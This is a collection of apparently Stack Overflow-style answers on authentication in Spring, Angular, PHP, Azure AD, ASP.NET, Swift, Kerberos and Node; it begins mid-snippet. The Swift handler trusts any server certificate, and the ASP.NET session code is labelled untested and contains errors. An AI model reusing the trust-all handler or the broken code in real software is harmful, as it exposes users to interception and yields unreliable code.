throw new CustomException("Unable to auth against third party systems"); } } @Override public boolean supports(Class<?> auth) { return auth.equals(UsernamePasswordAuthenticationToken.class); } I've used a Custom authentication. As I'm playing with spring security I didn't go for any database configuration. You can implement it in your own way. The above validates auth credentials and sets role(authorities). As admin can be able to view user modules as well(most cases, at least that's my conception), I've attached authorities user& admin when admin logs in. In simple words, 1. When a user log in he'll be able access every /** , but not /admin/** 2. When a admin log in he'll be able access every /** and /admin/** I've tested the scenarios, and the entire code you can go though here - https://github.com/satya-j/rab
To solve this issue, I created a new @ngrx/store action for refreshing my token and consume it using @ngrx/effects. I understand that not everyone will want to use effects but I find it to be very useful it a number of scenarios, not just this one. So my REST get function now looks like this: get(url: string): Observable<any> { return this.http.get(url, new RequestOptions({ headers: this.authHeader() })) .catch(err => { if (err.status === 401) { this.store.dispatch({type: 'REFRESH TOKEN'}); } return Observable.of(err); }) .map((res: Response) => res.json()) ; } This action is picked up by my effects module ... @Effect() refreshToken$ = this.actions$ .ofType('REFRESH TOKEN') .throttleTime(3000) .switchMap(() => this.authService.refreshLogin()) .map((response) => { // Store token }) Meanwhile, the function/action/whatever that receives the response from the REST get request can determine whether the request was successful or whether it failed because of failed authentication. If it was the latter, it can fire off the request another time (after waiting for the renewed token); otherwise, it can deal with another type of failure in a different way.
Okay, here is what i think you need.First session that are accessible from all the three domains. Here is something for that session_set_cookie_params(0, '/', '.your-domain.com'); session_start(); Now your session data would be shared across all your subdomains. Next, and i am simplifying this step because i noticed you wrote CPanel you need common session path for all subdomains. That is already done because by default session uses file to store session data. If you scale to multiple servers, make sure your session data is stored in some database server and accessible to all of the subdomains. Now you need to differentiate between which subdomain did the user came from. For that it is simple add a flag variable in login system to both to write the subdomain in php session. Example <?php if (user.login($username,$password)) { $_SESSION["authenticated"] = True; $_SESSION["authSource"] = $_SERVER['HTTP_HOST']; } ?> the method user.login is only for representation and not any actual method. You can change it according to your codes. So in conclusion the first part of the code segment will share session cookies across all subdomains of your domain. and the second part will set a flag on $_SESSION on which subdomain did the authentication occur from.
I based most of my work on this post that laid some groundwork. You need to create a Native Application in your Azure AD first and add the Windows Azure Service Management API permission. The ClientID is obtained from this App. This is the code I'm currently using to obtain a Token that can be used with the Management SDK: string userName = "yourUserName"; string password = "yourPassword"; string directoryName = "yourDirectory.onmicrosoft.com"; string clientId = "{ClientId obtained by creating an App in the Active Directory}"; var credentials= new UserPasswordCredential(string.Format("{0}@{1}", userName, directoryName), password); var authenticationContext = new AuthenticationContext("https://login.windows.net/" + directoryName); var result = await authenticationContext.AcquireTokenAsync("https://management.core.windows.net/", clientID, credentials); var jwtToken = result.AccessToken; //Example accesing Azure Cdn Management API string subscriptionId = "xxxx-xxxxxx-xxxx-xxxxxxx"; using (var cdn = new CdnManagementClient(new TokenCredentials(jwtToken)) { SubscriptionId = subscriptionId }) { //do something... } Your directory name can be obtained in the Azure Portal > Azure AD section, on Domain names.
That is what a Service is for in Angular. Here is an example Authentication Service I am using in one of my Applications. If you want to keep a User logged in after closing the application you should also store the user in the local storage. app.factory('AuthService', ['$q', '$http', 'LocalStorageService', function($q, $http, LocalStorageService) { var service = {}; service.user = LocalStorageService.get("AUTH_USER", null); service.isLoggedIn = function(){ return service.user != null && service.user != undefined && service.user != ""; } service.checkLogged = function(){ return $http.get(APPCONFIG.apiAccessPoint + "/user/" + service.user._id + "/isLogged").then(function(response){ if(!response.data.success || !response.data.logged){ service.logout(); return false; } else{ return true; } }, function(response){ service.logout(); return false; }); } service.login = function(name, password){ return $http.post(APPCONFIG.apiAccessPoint + "/user/login", {name: name, password: password}).then(function (response){ if(response.data.success){ LocalStorageService.set('AUTH_USER', response.data.data); $http.defaults.headers.common.Authorization = 'Bearer ' + response.data.data.token; service.user = response.data.data; } return response.data; }, function (response){ if(response.status == 400 || response.data.error_code == "VAL_ERROR"){ return response.data; } else{ return $q.reject(); } }); } service.logout = function(){ // remove token from local storage and clear http auth header LocalStorageService.deleteValue("AUTH_USER"); $http.defaults.headers.common.Authorization = ''; service.user = null; } return service; }]); And this is how you would use the service in a controller (for example showing a profile): app.controller('ProfileViewCtrl', ['$scope', '$routeParams', 'AuthService', 'UserService', function($scope, $routeParams, AuthService, UserService) { $scope.isLogged = AuthService.isLoggedIn(); $scope.user = null; $scope.notFound = false; $scope.ownProfile = false; $scope.user = UserService.getUser($routeParams.user).then(function(response){ if(response.success){ $scope.user = response.data; $scope.notFound = response.data == undefined; if(!$scope.notFound && $scope.isLogged){ $scope.ownProfile = $scope.user._id == AuthService.user._id; } } else{ console.log(response.data); } }); }]); Or with the login page: app.controller('LoginCtrl', ['$scope', '$route', 'AuthService', function($scope, $route, AuthService) { $scope.user = {}; $scope.login = function(){ AuthService.login($scope.user.name, $scope.user.password).then(function(response){ if(response.success){ $route.reload(); } else{ console.log("Wrong User or password..."); } }); } }]);
Forgive my ignorance, but i've not come across a piece of software where the claims would be sent in cookies. Typically, the problem with cookies is the possibility of XSS (Cross-site scripting) attacks because browsers are written to always send them. What people tend to do these days is use a federated authentication mechanism these days, where the Identity Provider (login page) and the Service Provider (the app code) are not necessarily the same app, and are not always directly connected. This means that the user's data that you could lookup in the db exists only in IdP and SP has to deal with whatever the IdP provided. This is why each bit of information is sent in a 'claim'. This means that the IdP claims that the username is john.smith, but SP may not have any means of checking this. To make it work, the IdP and SP should have established some form of trust, typically in the form of pre shared signing keys which allows the IdP to sign the token (SAML envelope or JWT, for example) and the SP to verify the signature to be able to check that the token has not been tampered with. Typically, this token is never used as a cookie; instead it is added to an Authorization header, normally using Bearer scheme. Also, as a side note - when you say you're familiar with using sessions, you have to understand that a session tracker is also a cookie (in ASP.NET). The server has information about a user stored in the app pool's memory cache and the browser keeps sending the cookie saying 'here i am'. So security wise there is comparable level between simply using cookies or using cookies + session. Of course one could argue that a cookie could leak information, but an app could always tokenize the data or encrypt the whole cookie negating this argument.
After several times of testing, I succeeded in reproducing your issue and got the same problem. To achieve your requirement I did some modification in Android client-end: 1, Cache authentication user in the MainActivity class. Following is my code snippet. For more details you can refer here. public static final String SHAREDPREFFILE = "temp"; public static final String USERIDPREF = "uid"; public static final String TOKENPREF = "tkn"; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); try { // Create the Mobile Service Client instance, using the provided Mobile Service URL and key mClient = new MobileServiceClient( "https://yourwebsitename.azurewebsites.net", this).withFilter(new ProgressFilter()); // Extend timeout from default of 10s to 20s mClient.setAndroidHttpClientFactory(new OkHttpClientFactory() { @Override public OkHttpClient createOkHttpClient() { OkHttpClient client = new OkHttpClient(); client.setReadTimeout(20, TimeUnit.SECONDS); client.setWriteTimeout(20, TimeUnit.SECONDS); return client; } }); authenticate(); } catch (MalformedURLException e) { createAndShowDialog(new Exception("There was an error creating the Mobile Service. Verify the URL"), "Error"); } catch (Exception e){ createAndShowDialog(e, "Error"); } } private void authenticate() { // We first try to load a token cache if one exists. if (loadUserTokenCache(mClient)) { createTable(); register(); } // If we failed to load a token cache, login and create a token cache else { // Login using the Google provider. ListenableFuture<MobileServiceUser> mLogin = mClient.login(MobileServiceAuthenticationProvider.Google); Futures.addCallback(mLogin, new FutureCallback<MobileServiceUser>() { @Override public void onFailure(Throwable exc) { createAndShowDialog("You must log in. Login Required", "Error"); } @Override public void onSuccess(MobileServiceUser user) { createAndShowDialog(String.format("You are now logged in - %1$2s", user.getUserId()), "Success"); cacheUserToken(mClient.getCurrentUser()); createTable(); register(); } }); } } private void cacheUserToken(MobileServiceUser user) { SharedPreferences prefs = getSharedPreferences(SHAREDPREFFILE, Context.MODE_PRIVATE); Editor editor = prefs.edit(); editor.putString(USERIDPREF, user.getUserId()); editor.putString(TOKENPREF, user.getAuthenticationToken()); editor.commit(); } private void register() { NotificationsManager.handleNotifications(this, NotificationSettings.SenderId, MyHandler.class); registerWithNotificationHubs(); } 2, In RegistrationIntentService class replace regID = hub.register(FCM_token).getRegistrationId(); with the following code: regID = hub.register(FCM_token, prefs.getString("uid", "")).getRegistrationId(); 3, Make sure add the line below to the first line within onHandleIntent method. SharedPreferences prefs = getSharedPreferences("temp", Context.MODE_PRIVATE);
You can define a custom user permission Voter for your User entity, see here. namespace AppBundle\Security; use AppBundle\Entity\User; use Symfony\Component\Security\Core\Authentication\Token\TokenInterface; use Symfony\Component\Security\Core\Authorization\Voter\Voter; use Symfony\Component\Security\Core\Authorization\AccessDecisionManagerInterface; class UserVoter extends Voter { private $decisionManager; public function __construct(AccessDecisionManagerInterface $decisionManager) { $this->decisionManager = $decisionManager; } protected function supports($attribute, $subject) { // only vote on User objects inside this voter if (!$subject instanceof User) { return false; } return true; } protected function voteOnAttribute($attribute, $subject, TokenInterface $token) { // ROLE_SUPER_ADMIN can do anything! The power! if ($this->decisionManager->decide($token, array('ROLE_SUPER_ADMIN'))) { return true; } $user = $token->getUser(); if (!$user instanceof User) { // the user must be logged in; if not, deny access return false; } /** @var User $targetUser */ $targetUser = $subject; // Put your custom logic here switch ($attribute) { case "ROLE_SONATA_ADMIN_USER_VIEW": return true; case "ROLE_SONATA_ADMIN_USER_EDIT": return ($user === $targetUser); } return false; } } Then you create the service sonata_admin.user_voter: class: AppBundle\Security\UserVoter arguments: ['@security.access.decision_manager'] public: false tags: - { name: security.voter } Be carefull of the access decision strategy, I may not work depending on your configuration if it's defined to unanimous or consensus You may also add a direct link/route to the user's own edit page if you don't want to give every user access to the user list. EDIT To restrict user role edition, as you don't want a user to edit its own role, you can simply edit the configureFormFields function : protected function configureFormFields(FormMapper $formMapper) { $formMapper ->add('username') ->add('plainPassword', 'text', array( 'required' => false, ) ) /* your other fields */ ; if ($this->isGranted('ROLE_SUPER_ADMIN')) { $formMapper->add('roles', \Symfony\Component\Form\Extension\Core\Type\CollectionType::class, array( 'entry_type' => \Symfony\Component\Form\Extension\Core\Type\ChoiceType::class, 'entry_options' => array( 'choices' => array( "ROLE_OPTICKSB2B" => "ROLE_OPTICKSB2B", "ROLE_ADMIN" => "ROLE_ADMIN", "ROLE_SUPER_ADMIN" => "ROLE_SUPER_ADMIN" ), ) )); } $formMapper ->add('isActive') ->add('title') ->add('firstname') ->add('lastname') ; } Obviously, Symfony forms component will check for you than no other field are added.
How can I create an X509 certificate and specify different values for "issued to" and "issued by"? You can't. Self-signed means the Issuer's Distinguished Name is the same as the Subject's Distinguished Name. It also means the Authority Key Identifier (AKI) is the same a s the Subject Public Key (SPKI). Here's an example from a CA root, which is a self signed certificate, too. There are a few differences between a CA root and a self signed end-entity certificate. For example, a CA sets Basic Constraint's CA=true and critical. $ openssl x509 -in DigiCertHighAssuranceEVRootCA.pem -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 02:ac:5c:26:6a:0b:40:9b:8f:0b:79:f2:ae:46:25:77 Signature Algorithm: sha1WithRSAEncryption Issuer: C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert High Assurance EV Root CA Validity Not Before: Nov 10 00:00:00 2006 GMT Not After : Nov 10 00:00:00 2031 GMT Subject: C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert High Assurance EV Root CA Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (2048 bit) Modulus: 00:c6:cc:e5:73:e6:fb:d4:bb:e5:2d:2d:32:a6:df: e5:81:3f:c9:cd:25:49:b6:71:2a:c3:d5:94:34:67: a2:0a:1c:b0:5f:69:a6:40:b1:c4:b7:b2:8f:d0:98: a4:a9:41:59:3a:d3:dc:94:d6:3c:db:74:38:a4:4a: cc:4d:25:82:f7:4a:a5:53:12:38:ee:f3:49:6d:71: 91:7e:63:b6:ab:a6:5f:c3:a4:84:f8:4f:62:51:be: f8:c5:ec:db:38:92:e3:06:e5:08:91:0c:c4:28:41: 55:fb:cb:5a:89:15:7e:71:e8:35:bf:4d:72:09:3d: be:3a:38:50:5b:77:31:1b:8d:b3:c7:24:45:9a:a7: ac:6d:00:14:5a:04:b7:ba:13:eb:51:0a:98:41:41: 22:4e:65:61:87:81:41:50:a6:79:5c:89:de:19:4a: 57:d5:2e:e6:5d:1c:53:2c:7e:98:cd:1a:06:16:a4: 68:73:d0:34:04:13:5c:a1:71:d3:5a:7c:55:db:5e: 64:e1:37:87:30:56:04:e5:11:b4:29:80:12:f1:79: 39:88:a2:02:11:7c:27:66:b7:88:b7:78:f2:ca:0a: a8:38:ab:0a:64:c2:bf:66:5d:95:84:c1:a1:25:1e: 87:5d:1a:50:0b:20:12:cc:41:bb:6e:0b:51:38:b8: 4b:cb Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Certificate Sign, CRL Sign X509v3 Basic Constraints: critical CA:TRUE X509v3 Subject Key Identifier: B1:3E:C3:69:03:F8:BF:47:01:D4:98:26:1A:08:02:EF:63:64:2B:C3 X509v3 Authority Key Identifier: keyid:B1:3E:C3:69:03:F8:BF:47:01:D4:98:26:1A:08:02:EF:63:64:2B:C3 Signature Algorithm: sha1WithRSAEncryption 1c:1a:06:97:dc:d7:9c:9f:3c:88:66:06:08:57:21:db:21:47: f8:2a:67:aa:bf:18:32:76:40:10:57:c1:8a:f3:7a:d9:11:65: 8e:35:fa:9e:fc:45:b5:9e:d9:4c:31:4b:b8:91:e8:43:2c:8e: b3:78:ce:db:e3:53:79:71:d6:e5:21:94:01:da:55:87:9a:24: 64:f6:8a:66:cc:de:9c:37:cd:a8:34:b1:69:9b:23:c8:9e:78: 22:2b:70:43:e3:55:47:31:61:19:ef:58:c5:85:2f:4e:30:f6: a0:31:16:23:c8:e7:e2:65:16:33:cb:bf:1a:1b:a0:3d:f8:ca: 5e:8b:31:8b:60:08:89:2d:0c:06:5c:52:b7:c4:f9:0a:98:d1: 15:5f:9f:12:be:7c:36:63:38:bd:44:a4:7f:e4:26:2b:0a:c4: 97:69:0d:e9:8c:e2:c0:10:57:b8:c8:76:12:91:55:f2:48:69: d8:bc:2a:02:5b:0f:44:d4:20:31:db:f4:ba:70:26:5d:90:60: 9e:bc:4b:17:09:2f:b4:cb:1e:43:68:c9:07:27:c1:d2:5c:f7: ea:21:b9:68:12:9c:3c:9c:bf:9e:fc:80:5c:9b:63:cd:ec:47: aa:25:27:67:a0:37:f3:00:82:7d:54:d7:a9:f8:e9:2e:13:a3: 77:e8:1f:4a ... I have generated a self-signed certificate using this very good tutorial: https://www.youtube.com/watch?v=1xtBkukWiek. I did not watch your video, but you may be interested in the following if you are missing attributes like Authority Key Identifier (AKI): How do you sign Certificate Signing Request with your Certification Authority How to create a self-signed certificate with openssl?
You could use a Value Converter to process object. In fact, there is a nice example for that in the [Documentation, last section]. Applying above example to your case, it's even possible to process objects without any prior transformation. Gist demo: https://gist.run/?id=4514caa6ee7d40df2f7cfe2605451a0e I wouldn't say it’s the most optimal solution, though. You might want to transform the data somehow before passing it to repeat.for. Just showing a possibility here. Template: <!-- First level properties --> <div repeat.for="mainKey of data | keys"> <label>${mainKey}</label> <!-- Sublevel - Value Object properties --> <select> <option value="">---</option> <option repeat.for="code of data[mainKey] | keys" value="${code}">${data[mainKey][code]}</option> </select> </div> keys value converter: export class KeysValueConverter { toView(obj) { return Reflect.ownKeys(obj); } } Update: But how do I target one specific item without having to iterate over all of them? I've extended the original gist demo, you can check it out. This would work, but it wouldn't be reusable <label>Absence Code</label> <select> <option value="">---</option> <option repeat.for="code of data.AbsenceCode | keys" value="${code}">${data.AbsenceCode[code]}</option> </select> A better way would be to create a custom element (Note: <require> is there for demo purposes. Normally, you'd add it to globalResources.) Organizing above template into a custom element with source and name bindable properties: source: your data object name: first-level property of data object (e.g. AbsenceCode) enum-list.html <template> <require from="./keys-value-converter"></require> <label>${name}</label> <select name="${name}" class="form-control"> <option value="">---</option> <option repeat.for="code of source[name] | keys" value="${code}">${source[name][code]}</option> </select> </template> You can also use name property in conjunction with aurelia-i18n to display a meaningful label. E.g. ${name | t}. enum-list.js import {bindable} from 'aurelia-framework'; export class EnumList { @bindable source; @bindable name; } Usage Individual dropdowns: <enum-list source.bind="data" name="AbsenceCode"></enum-list> <enum-list source.bind="data" name="AuthenticationLog"></enum-list> Since <enum-list> has all the data, its name property can also be changed at runtime! :) <label>Type</label> <select class="form-control" value.bind="selectedType"> <option repeat.for="mainKey of data | keys" value="${mainKey}">${mainKey}</option> </select> <br> <enum-list source.bind="data" name.bind="selectedType"></enum-list>
A token based authentication system does not imply JWT as the token format. If you pick the Slack or MS Graph implementation and move the clientState/token from the body of the request to an Authorization header using the Bearer scheme you won't find significant differences. It's true that the header would be the most appropriate way to pass information designed to authenticate the request and servers might treat the header in a more secure way than the request body... but for the sake of this discussion lets ignore that. The token would be a by-reference token where the actual value is meaningless and the validity and any associated information are obtained by the consumer from an independent store. In this case the validity is judged purely by ensuring the token matches the value you expect and there's no additional information stored in association with the token, but this is still an authentication system based on bearer tokens in the sense that anyone that has the token can make the request. Also, the tokens are not obtained through any OAuth 2.0 flow, but that would be overkill for scenarios like these ones. The Github implementation would be classified as an improvement over the pure bearer one, because there's no token traveling on the wire, only a signature of the payload which means an attacker that is able to decrypt the communication channel would only be able to replay captured requests and not issue requests with different payloads. Conclusion You probably won't find webhooks implementations using the full featured OAuth 2.0 plus JWT as the token format, because it would be an overkill for the use case at hand. Update: The expiration of a JWT is whatever you want it to be, as it would be the expiration of by-reference tokens (what you call simple tokens). The message I was trying to pass is that you don't need JWT's, nor OAuth, to have a token based authentication system. The security characteristics of a token based system can be designed independently of the token format used; yes some formats will simplify some aspects while possibly making other aspects more complex. It's always a trade-off... In a system where you only want to ensure that who's calling is someone you trust and not just a complete stranger a JWT seems overkill; that's my opinion of course. About the simple token itself being the secret that depends on what you exactly mean by secret. A JWT or a by-reference token used in a bearer authentication scheme gives you the exact same result if they are leaked. Whoever has the token can make request while the token is valid. If you're referring to the secret/key used to sign the JWT which is not transmitted on the wire, again this is something that would be exactly the same if you used a signed by-reference token. Again, the honest answer to your underlying question is that those system added the security mechanisms they thought were worth it taking in consideration the threat model for the system. Personally, I don't disagree with not using OAuth 2.0 plus JWT as it seems completely not worth it in that use case. My preference would be to go for the Github approach. You may not like the security characteristics that they provide, but both MS Graph and Slack approaches are token based systems using bearer tokens.
Here is syntax as per swift 3. Just verify firstly in which part of the delegate method it entered open func urlSession(_ session: URLSession, didReceive challenge: URLAuthenticationChallenge, completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Swift.Void){ var disposition: URLSession.AuthChallengeDisposition = URLSession.AuthChallengeDisposition.performDefaultHandling var credential:URLCredential? if challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust { credential = URLCredential(trust: challenge.protectionSpace.serverTrust!) if (credential != nil) { disposition = URLSession.AuthChallengeDisposition.useCredential } else{ disposition = URLSession.AuthChallengeDisposition.performDefaultHandling } } else{ disposition = URLSession.AuthChallengeDisposition.cancelAuthenticationChallenge } if (completionHandler != nil) { completionHandler(disposition, credential); } }
Create A Custom AuthenticationSuccessHandler like below public class CustomAuthenticationSuccessHandler implements AuthenticationSuccessHandler { public void onAuthenticationSuccess(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response, Authentication authentication) throws IOException, javax.servlet.ServletException { if(authentication.getAuthorities().contains(new SimpleGrantedAuthority("ROLE_ADMIN")) { request.getRequestDispatcher("/admin").forward(request, response); } else if (authentication.getAuthorities().contains(new SimpleGrantedAuthority("ROLE_USER")) { request.getRequestDispatcher("/user").forward(request, response); } } } And configure it with form-login tag as following <bean id="customAuthenticationSuccessHandler" class="CustomAuthenticationSuccessHandler" /> <form-login authentication-success-handler-ref="customAuthenticationSuccessHandler" ...> UPDATE Create a Controller mappings /landing point to it by <form-login login-page="/landing" .../>. This landing should have links to admin and user landing pages. Which can have links or forms to login. You can remove protection from these landing pages. <http pattern="/landing**" security="none"/> <http pattern="/landing/admin**" security="none"/> <http pattern="/landing/user**" security="none"/> And you can write a Custom AuthenticationFailureHandler to redirect to correct login page.
Check this :) You probably need requests, if you don't have. I don't know much about the salesforce library. import requests import pdfkit session = requests.session() def download(session,username,password): session.get('https://bneadf.thiess.com.au/adfs/ls/') ua = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' session.headers = {'User-Agent': self.ua} payload = {'UserName':username, 'Password':password, 'AuthMethod':'FormsAuthentication'} session.post('https://bneadf.thiess.com.au/adfs/ls/', data = payload, headers = session.headers) my_html = session.get('https://thiess.my.salesforce.com/0069000000IZH71') my_pdf = open('myfile.html','wb+') my_pdf.write(my_html.content) my_pdf.close() path_wkthmltopdf = 'C:\Program Files\wkhtmltopdf\bin\wkhtmltopdf.exe' config = pdfkit.configuration(wkhtmltopdf=bytes(path_wkthmltopdf, 'utf8')) pdfkit.from_file('myfile.html', 'out.pdf') download(session,"yourusername","yourpass")
The ability to refresh a token programmatically without any type of user interaction is accomplished through the use of refresh tokens. However, this is not applicable for browser-based applications because refresh tokens are long-lived credentials and the storage characteristics for browsers would place them at a too bigger risk of being leaked. If you want to continue to use the resource owner password credentials grant you can choose to ask the user to input the credentials again when the tokens expire. As an alternative, upon authentication you can obtain the required user information and initiate an application specific session. This could be achieved by having your server-side logic create an application specific session identifier or JWT. You can also stop using the resource owner password credentials grant and redirect the user to an Auth0 authentication page that besides returning the tokens to your application would also maintain an authenticated session for the user, meaning that when the tokens expired and your application redirected again to Auth0, the user might not need to manual reenter credentials because the Auth0 session is still valid. In relation to the password being sent in plaintext; the resource owner endpoint relies on HTTPS so the data is encrypted at the protocol level. You must also use HTTPS within your own application for any type of communication that includes user credentials of any kind. Also note that you can control what's returned within the ID token through the use of scopes, depending on the amount of information in question you might not even need to make additional calls to get the user profiles if you signal that you want that information to be contained within the ID token itself.
This is the snippet I used. Note I passing user id and password to createConnection call because I have user authentication enabled. Without them, I would get MQRC 2035 error. fact = XMSFactoryFactory.GetInstance(XMSC.CT_WMQ); conf = fact.CreateConnectionFactory(); conf.SetIntProperty(XMSC.WMQ_CONNECTION_MODE, XMSC.WMQ_CM_CLIENT_UNMANAGED); conf.SetStringProperty(XMSC.WMQ_QUEUE_MANAGER, "QM1"); conf.SetStringProperty(XMSC.WMQ_HOST_NAME, "localhost"); conf.SetIntProperty(XMSC.WMQ_PORT, 1414); conf.SetStringProperty(XMSC.WMQ_CHANNEL, "NET.SVRCONN"); conf.SetStringProperty(XMSC.WMQ_SSL_KEY_REPOSITORY, "C:\\ProgramData\\IBM\\MQ\\qmgrs\\QM1\\ssl\\CLIENT"); conf.SetStringProperty(XMSC.WMQ_SSL_CIPHER_SPEC, "TLS_RSA_WITH_AES_128_CBC_SHA"); conf.SetStringProperty(XMSC.WMQ_SSL_PEER_NAME, "CN=QM1,OU=QMHOST,OU=LAB,OU=PAS,O=COM,L=BLR,ST=KA,C=IN"); conf.SetStringProperty(XMSC.WMQ_SSL_CLIENT_CERT_LABEL, "ibmwebspheremqsamantha"); mqConn = conf.CreateConnection("samantha","Passw0ord");
Assuming your service is exposing a standard REST API (or similar) that your front-end is calling: yes, SSL is the standard. It provides: Confidentiality: the data is encrypted between the client and the server and cannot be read by an attacker. Typically uses the RSA algorithm. Integrity: an attacker cannot tamper with the messages sent between the client and the server. Typically implemented using HMAC Authentication: the client is able to check that the server it is talking to is actually yours, and not an attacker. Basically, the server shows to the client a certificate signed by the Certificate Authority having issued the SSL certificate (e.g. VeriSign), that proves its identity. All that is assuming SSL is configured properly on the server's side: up-to-date ciphers, no support for outdated ones, proper key length (2048 bits or higher), etc. Note that a client can be anything calling your service: a browser-based application, a mobile application, a smart watch application... You can use SSL Labs to check if your SSL configuration looks secure.
Yes, it is possible to change the Reply URL dynamiclly using the RedirectToIdentityProvider. You can refer the code sample below: app.UseOpenIdConnectAuthentication( new OpenIdConnectAuthenticationOptions { ClientId = clientId, Authority = authority, PostLogoutRedirectUri = postLogoutRedirectUri, RedirectUri = postLogoutRedirectUri, Notifications = new OpenIdConnectAuthenticationNotifications { AuthenticationFailed = context => { context.HandleResponse(); context.Response.Redirect("/Error?message=" + context.Exception.Message); return Task.FromResult(0); }, RedirectToIdentityProvider=(context)=> { context.ProtocolMessage.RedirectUri = ""; return Task.FromResult(0); } } }); However, if the application was already deployed to the web server, change the redirect URL to localhost may not work as you expected since there are two different application server for the web app running.
Firstly, no. There is no way to access cookies in another session as they only exist for the lifetime of the request/response. However, you could store a static List of all current authenticated users and invalidate them that way. This is a bit problematic because in the case that the App Pool recycles - all users will be 'logged out'. If this is not an issue for you (i.e. the app pool recycles at 2am and it is for a business system that does not operate at 2 am) then you can try this... Code provided is untested source: https://msdn.microsoft.com/en-us/library/system.web.security.formsauthenticationmodule.authenticate EDIT: I was not removing the cookie from the request and expiring it in the response. In the Global.asax private static List<string> _authenticatedUsers = new List<string>(); public static AuthenticateUser (MyApplicationUser user) { if(!_authenticatedUsers.ContainsKey(user.Username)) { _authenticatedUsers.Add(user.Username); } } public static DeauthenticateUser (MyApplicationUser user) { if(_authenticatedUsers.ContainsKey(user.Username)) { _authenticatedUsers.Remove(user.Username); } } public void FormsAuthentication_OnAuthenticate(object sender, FormsAuthenticationEventArgs args) { if (FormsAuthentication.CookiesSupported) { if (Request.Cookies[FormsAuthentication.FormsCookieName] != null) { try { FormsAuthenticationTicket ticket = FormsAuthentication.Decrypt( Request.Cookies[FormsAuthentication.FormsCookieName].Value); MyApplicationUser user = JsonConvert.DeserializeObject(ticket.UserData); if(user == null || !_authenticatedUsers.Any(u => u == user.Username)) { // this invalidates the user args.User = null; Request.Cookies.Remove(FormsAuthentication.FormsCookieName); HttpCookie myCookie = new HttpCookie(FormsAuthentication.FormsCookieName); DateTime now = DateTime.Now; myCookie.Value = "a"; myCookie.Expires = now.AddHours(-1); Response.Cookies.Add(myCookie); Response.Redirect(FormsAuthentication.LoginUrl); Resonpse.End(); } } catch (Exception e) { // Decrypt method failed. // this invalidates the user args.User = null; Request.Cookies.Remove(FormsAuthentication.FormsCookieName); HttpCookie myCookie = new HttpCookie(FormsAuthentication.FormsCookieName); DateTime now = DateTime.Now; myCookie.Value = "a"; myCookie.Expires = now.AddHours(-1); Response.Cookies.Add(myCookie); Response.Redirect(FormsAuthentication.LoginUrl); Resonpse.End(); } } } else { throw new HttpException("Cookieless Forms Authentication is not " + "supported for this application."); } } In your login action public ActionResult Login(LoginViewModel loginViewModel) { ... if (!result.Error) { ... MvcApplication.AuthenticateUser(result.User); ... } ... } In your logout action public ActionResult Logout(...) { ... MvcApplication.DeauthenticateUser(user); ... } In your delete method ... MvcApplication.DeauthenticateUser(user); ...
OpenID/ OAuth is a general "protocol" that allows a site (e.g. stackoverflow) to reside on an identity provider (e.g. Google) for authentication. This includes a transaction where You tell stackoverflow that you will use goole for login stackoverflow will send to to Google to get authenticated with a redirect url. Google will authenticate you, effectively will log you in their services (so as to know you are you) Google (And any other Identity provider) should ask you if you want your email and other information to be sent to stackoverflow If you agree google will send this info to the consumer (stackoverflow) From this point on it is up to the auth consumer (e.g. stackoverflow) to accept this information (your email) as valid. Any scheme that does not go through the ID provider's login (step 3), will expose your credentials to a (possibly) untrusted third party (would you wnat stackoverflow to have your google password?) Step 3 also installs a cookie on your machine which contains your session with Google. It is up to Google (or any ID provider) to consider this session valid for all other uses (Gmail etc) but it is a convenient feature anyway If you already have an established session with Google, it possibly won't require you to log in again.
You are locking down the allowed encryption types in your krb5.conf to only allow the AES128 encryption types while you want to do AES256, so that's one problem. At the very bottom of your krb5.conf the last line is wrong. Should be .athena.local=ATHENA.LOCAL (Ref: http://web.mit.edu/KERBEROS/krb5-1.5/krb5-1.5.4/doc/krb5-admin/Sample-krb5_002econf-File.html) If your keytab actually has support for AES256 encryption types in it, then the Directory account to which the keytab is related also must be enabled to support AES256 encryption types. There's a checkbox for this if you are using Active Directory. You must have an SPN registered for the service you are trying to authenticate to in the Directory/Kerberos database. If it's an HTTP service, it would look something like: HTTP/server1.athena.local You'll need the Java jurisdiction unlimited strength policy files present on your server to decrypt AES256 encryption. Last but not least, you didn't specify what Directory service you are using Kerberos with. Is it Active Directory? Red Hat IdM? OpenDirectory? Heimdal Kerberos. Not a lot to go on here.
First of all, as others have already pointed out in the comments, you shouldn't implement your own authentication logic if you don't know what you're doing. You can use Passport for that. Now, to the code you provided. There are several problems here. The first thing that comes to mind is that you use: var isAuth = username === data['username'] & password === data['password']; instead of: var isAuth = username === data['username'] && password === data['password']; But this is just a typo. Now, to more fundamental stuff. You cannot return the isAuth variable because who are you going to return it to? If you think that it will get returned to the caller of exports.auth then you're wrong - the exports.auth() will return long before the return isAuth; is ever run. Also, if yu check for error with if (err) then put the code that should be run in the case of success in the else block o otherwise it will also be run on error with undefined variables that may crash your program. You need to either add an additional argument to your function which is a callback: exports.auth = function(username, password, session, callback) { User.findOne({username: username}, function(err, data) { if (err) { console.log(err); callback(err); } else { var isAuth = username === data.username && password === data.password; if (isAuth) { session.isAuthenticated = isAuth; session.user = {username: username}; } callback(null, isAuth); } }); }; or to return a promise from your exports.auth function (but directly from your exports.auth function, not some other callback inside). Using the above version you can call it with: auth(username, password, session, function (isAuth) { // you have your isAuth here }); The other option would be to use promises. You can see some other answers where I explain the difference between callbacks and promises and how to use them together in more detail, which may be helpful to you in this case: A detailed explanation on how to use callbacks and promises Explanation on how to use promises in complex request handlers An explanation of what a promise really is, on the example of AJAX requests But first you need to get comfortable with callbacks. Also, never store the passwords in cleartext in the database. Seriously, use some other solution that works like Passport. I wrote the answer to explain the process of using callbacks, not to endorse the idea of using authentication in that particular way. You have been warned.
